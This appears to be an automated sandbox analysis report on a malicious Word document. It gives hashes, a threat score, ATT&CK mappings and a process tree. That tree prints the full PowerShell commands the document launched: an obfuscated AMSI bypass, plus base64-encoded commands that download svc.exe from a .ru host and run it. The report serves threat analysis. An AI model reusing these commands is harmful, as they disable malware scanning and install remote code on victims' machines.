bc27b3afc72c925df021166fccc262ccf75e2be6f8b04c6772ed36ee8d5a1de0

Analysis

max time kernel
120s
max time network
123s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
07/02/2025, 05:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d6d722ae73ddff1ad7c468feca882b159a2a6e267df8b219482b514cdab74c21.doc
Size

119KB
MD5

7564fc9db09034f49408c33fae34a335
SHA1

c0a49e5e0054673b3cea2a9e279c896eb2ebec27
SHA256

d6d722ae73ddff1ad7c468feca882b159a2a6e267df8b219482b514cdab74c21
SHA512

7e0cc0628d8d6c00c713fa9318d0ec0735f19d449bcf86e6c93e837bd55364d2029b4d309538fc8be5d1b5035499572d2f5e3480593576171b9e6ca059e3b94a
SSDEEP

1536:J7LlLq2TvoxHCQQv56sSFXC5uHQA1pzJGrDwQwMw1UV6XhnOQ5w:dLzTKiQa2SgPpzErF41k6ksw

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://goodmastersportunicum.ru/load/svc.exe

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1940	2580	Powershell.exe	29

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1940	Powershell.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Office loads VBA resources, possible macro or embedded object present

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2580	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1940	Powershell.exe
2632	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1940	Powershell.exe
Token: SeDebugPrivilege	2632	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2580	WINWORD.EXE
2580	WINWORD.EXE

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2580 wrote to memory of 2376	2580	WINWORD.EXE	30
PID 2580 wrote to memory of 2376	2580	WINWORD.EXE	30
PID 2580 wrote to memory of 2376	2580	WINWORD.EXE	30
PID 2580 wrote to memory of 2376	2580	WINWORD.EXE	30
PID 2580 wrote to memory of 1940	2580	WINWORD.EXE	31
PID 2580 wrote to memory of 1940	2580	WINWORD.EXE	31
PID 2580 wrote to memory of 1940	2580	WINWORD.EXE	31
PID 2580 wrote to memory of 1940	2580	WINWORD.EXE	31
PID 1940 wrote to memory of 2632	1940	Powershell.exe	34
PID 1940 wrote to memory of 2632	1940	Powershell.exe	34
PID 1940 wrote to memory of 2632	1940	Powershell.exe	34
PID 1940 wrote to memory of 2632	1940	Powershell.exe	34

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d6d722ae73ddff1ad7c468feca882b159a2a6e267df8b219482b514cdab74c21.doc"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2580
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2376
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
  Powershell -C $FEIfwuioehfaiwyYOETWTRuwye = 'a'+'ms'+'iI'+'ni'+'tF'+'a'; $EF8034uowieypowiue = 'il'+'ed'; $Ceoiuwjoeuyfw = 'Sy'+'st'+'em.Ma'+'na'+'gem'+'ent.'+'Aut'+'omat'+'io'+'n.A'+'ms'+'iUt'+'ils';$DFiowjhOHWOHEOUF = $null; sleep 3; $text = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('W1JlZl0uQXNzZW1ibHkuR2V0VHlwZSgkQ2VvaXV3am9ldXlmdykuR2V0RmllbGQoJEZFSWZ3dWlvZWhmYWl3eVlPRVRXVFJ1d3llICsgJEVGODAzNHVvd2lleXBvd2l1ZSwiTm9uUCIgKyAidWIiICsgImxpYyxTdCIgKyAiYXRpYyIpLlNldFZhbHVlKCRERmlvd2poT0hXT0hFT1VGLCR0cnVlKQ==')); iex $text; $BBB = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFVVVSA9ICdodHRwOi8vZ29vZG1hc3RlcnNwb3J0dW5pY3VtLnJ1L2xvYWQvc3ZjLmV4ZSc7ICRQUFAgPSAnQzpcVXNlcnNcUHVibGljXExpYnJhcmllc1xzdmMuZXhlJzsgJFdXVyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRXV1cuRG93bmxvYWRGaWxlKCRVVVUsICRQUFApOyBTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAkUFBQOw==')); $CCC = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($BBB)); powershell -E $CCC;
  2⤵
  - Process spawned unexpected child process
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1940
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABVAFUAVQAgAD0AIAAnAGgAdAB0AHAAOgAvAC8AZwBvAG8AZABtAGEAcwB0AGUAcgBzAHAAbwByAHQAdQBuAGkAYwB1AG0ALgByAHUALwBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnADsAIAAkAFAAUABQACAAPQAgACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABMAGkAYgByAGEAcgBpAGUAcwBcAHMAdgBjAC4AZQB4AGUAJwA7ACAAJABXAFcAVwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFcAVwBXAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAVQBVACwAIAAkAFAAUABQACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAUABQAFAAOwA=
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2632

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
1f05732a436ca33d8ca0552bdd44c9cc

SHA1
65574888e4ff62d1e4eccd0978dad47cd0177904

SHA256
f3c3ce30b8601ff2ead4cedc6feceb99355f921ba688a7e69afa90aab6c56d1b

SHA512
fdb3f8f346e1facfb4e7f6f3fe6a83ee2377bb2c4faca3b2c4c0c813b0ec6b0aef228b8150a0fab82a55d75d48328994ce3ca02c164d0e18958a52dded14be7b

Download Submit
memory/2580-0-0x000000002F081000-0x000000002F082000-memory.dmp

Filesize
4KB

Download
memory/2580-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2580-2-0x000000007172D000-0x0000000071738000-memory.dmp

Filesize
44KB

Download
memory/2580-7-0x0000000000550000-0x0000000000650000-memory.dmp

Filesize
1024KB

Download
memory/2580-5-0x0000000000550000-0x0000000000650000-memory.dmp

Filesize
1024KB

Download
memory/2580-4-0x0000000000550000-0x0000000000650000-memory.dmp

Filesize
1024KB

Download
memory/2580-19-0x000000007172D000-0x0000000071738000-memory.dmp

Filesize
44KB

Download
memory/2580-20-0x0000000000550000-0x0000000000650000-memory.dmp

Filesize
1024KB

Download